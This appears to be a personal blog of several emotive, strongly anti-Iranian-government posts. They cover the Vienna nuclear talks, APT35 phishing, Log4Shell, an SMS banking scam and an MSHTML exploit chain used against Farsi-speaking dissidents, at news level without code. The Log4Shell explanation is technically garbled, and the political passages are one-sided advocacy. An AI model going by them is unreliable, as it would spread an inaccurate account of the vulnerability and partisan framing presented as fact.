JCPOA Negotiations: How Iranian regime delegation in Vienna are leading world partners down a path of deceit and delay 🤬🤬🤬

JCPOA Vienna Talks (Image credit: Foreign Brief) 

Private talks in Vienna between Iran and Western powers aimed at reviving nuclear deal reached in 2015 have been going on for some time but there have been reports of numerous differences between the two sides. E3 diplomats say Iranian regime delegation unwilling to negotiate genuinely and as Iran's deceptive regime continues to stockpile uranium E3 diplomats warn that the nuclear deal will become a hollow shell in the not-too-distant future.

Iran's response to these allegations is as usual a deceptive and deviant response saying that diplomacy is a two-way street that goes so far as to accuse Western powers of playing the blame game. But the reality is very different as usual. Leaked notes from these talks indicate that the Iranian regime wants all sanctions to be lifted by the United States regardless of whether the sanctions were imposed because of  nuclear deal. 🤦‍♂️🤦‍♂️

It is clear that this delegation and by proxy this evil regime of mullahs have no interest in negotiating with the Western powers in this regard. They continue to delay and deceive their partners into thinking that an agreement can be reached while behind scenes they continue to stockpile uranium for nuclear weapons. this is so BAD! Western powers must be ready to withdraw from these negotiations and take further measures to eliminate this regime.

The innocent people of Iran suffer every day because they fail to act 😭😭

Charming Kitten AKA APT35 activity up rapidly in 2021: Google Issue public warning

 

It has been reported that the servant group of this corrupt Iranian regime called the Charming Kitten also known as APT35 has steadily increased its cyber attacks this year and increased the complexity of its cyber attacks. Google has now issued a public warning against the group.

Charming Kitten became famous in 2020 for phishing the accounts of US White House staff in the run-up to the 2020 US presidential election and they continued their evil ways in 2021. They Withdraw credentials from a British university called SOAS using a phishing kit and deploying a piece of spyware in mobile app stores that pretend to be VPNs. They also used telegram sendMessage API to find out the IP addresses and whereabouts of victims who clicked on their phishing links, as well as pretending to be staff members at Think20 conventions in Munich and here at home in Italy sending malicious phishing links to innocent victims.

Google have issues public warning of State-Sponsored cyber attacks 

It is worrying trend that Google feels that the threat posed by Charming Kitten is strong enough to issue a public announcement because they feel that the complexity of attacks from this horrific group is increasing. When will this corrupt regime stop trying to turn the lives of others into hell ??? 😡😡

Log4shell: Log4j zero-day vulnerability is a cybersecurity disaster!! and cyber criminals and hostile regimes are big winners 😟🤦‍♂️

The whole cybersecurity community and InfoSec community have been talking about Log4Shell since the Log4Shell news broke last Friday. Log4j is an Apache product and is a Java-based log library that has been around for over 20 years. A vulnerability called CVE-2021-44228 allows a hacker to use the LDAP protocol to interpret Log4j a log message as a URL and then send a GET request to the vulnerable server. Executable loads can then be activated within the GET request using the programming parameters ${} meaning that the hacker has full access to Remote code execution or RCE privilages and can then attack a server however he or she wishes.

Diagram showing Log4j / CVE-2021-44228 vulnerability (image credit: Juniper Threat Labs)  

If many companies did not use log4j, this would be a minor issue. However, the fact that log4j has been around for so long means that hundreds of thousands of companies that store millions of records of public data including government websites and even Minecraft servers are at risk. Another big problem is that older versions of Log4j exist on many older systems and cost millions to identify and repair.

Its clear that Log4Shell is one of the biggest disasters in cybersecurity and criminals are already using it. RCE exploit has been reported to have been used for at least 9 days before the zero-day vulnerability became public and ransomware attacks linked to Log4Shell have also begun to appear. Now is the time for cybercriminals and hostile government actors to steal citizens data and try to exploit it in a criminal way. 😡😡

Please friends update your Log4j packages to the modified version and continue to lobby the companies that store your data to make sure they do their best to keep your data safe. 🙏🙏

The Iranian government was once again subjected to criminal SMS fraud

The Radio and Television Agency has reported that tens of thousands of Iranian citizens have been targeted for financial fraud by text message impersonating Iranian government.

This scam is committed by cyber criminals who first forge hyperlinks alleging to be Sana system, which is used for the Iranian justice registration system via SMS. This text message is likely to contain content designed to intimidate recipients into downloading an application to pay for services. Once the victim has downloaded the app and entered their credit card details to pay for the service, cybercriminals will now have all the details they need to start committing bank fraud against the victim, which is usually between $ 1,000 and $ 2,000 per victim. 💰💰

Fraudulent Sana System Application used by these cyber criminals 

It has been reported that this is most likely the malicious act of independent cybercriminals rather than government actors, but it is clear that the Iranian government's cyber security measures are so weak that they can easily be exploited to defraud the hardworking people of Iran. When will this corrupt regime stop wasting its time and money attacking other countries and instead spend its time and money on improving its own cyber security? It is a shame at this stage, and in the end the innocent people of Iran are suffering.

Iranian cyber actors exploiting Microsoft MSHTML Vulnerability to steal Google and Instagram credentials of Farsi Speakers

Safebreach experts report that a new Iranian cyber actor has used a exploit of Microsoft MSHTML Remote Code Execution (RCE) to infect farsi-speaking victims using a new malicious PowerShell script. The attackers rely on victims who did not patch CVE-2021-40444 an RCE vulnerability in Microsoft's browser engine that was patched in September 2021. This Powershell script is only 150 lines long but provides a lot of very personal items to the attacker. Information about victims such as telegram files and screenshots as well as collecting documents and information about the victim system environment.

Snippet of Malicious PowerShell Source Code 

 

The hackers are tied to the Iranian regime because the monitoring of victims telegrams is very similar to other Iranian hacker groups such as Infy Ferocious Kitten and Rampant Kitten. To download the malicious PowerShell script a word document is dropped on the victim system via spearphishing email. Based on content of destructive word document, which displays an article blaming Khamenei for his avoidance of American and British vaccines as well as the nature of the data collected the victims are thought to be Iranians like me. They are abroad and critics of the regime. About half of victims are based in the United States.

          Location of Iranian Victims Targeted (Source: safebreach)

There have been two ways these hackers have hunted down victims. One way was to create a phishing website called deltaban.com. deltaban.com claims to be a legitimate travel agency in fact is a phishing website for these Iranian hackers that forces users to enter Gmail and Instagram credentials. If an uninformed victim does this, his or her Gmail and Instagram credentials will be compromised and stored on a rogue C2 server controlled by hackers. The second way, as mentioned above, is obtained in 3 steps. 1. A spearphishing email is sent with a malicious word document attached. 2. The Word file then connects to a malicious C2 server then executes rogue JavaScript code and creates a .DLL file in %temp% directory. 3. That malicious .DLL file then executes the PowerShell script mentioned above.

                        CVE-2021-40444 Vulnerability 

At present, this corrupt regime seems to want to carry out cyber attacks on a daily basis and also does not care whether these attacks harm  Iranian people. When will this madness end?? Please friends protect yourself and download the latest patch so that these cyber attacks can not steal your information. Stay safe friends 🙏🙏

Original Report: https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/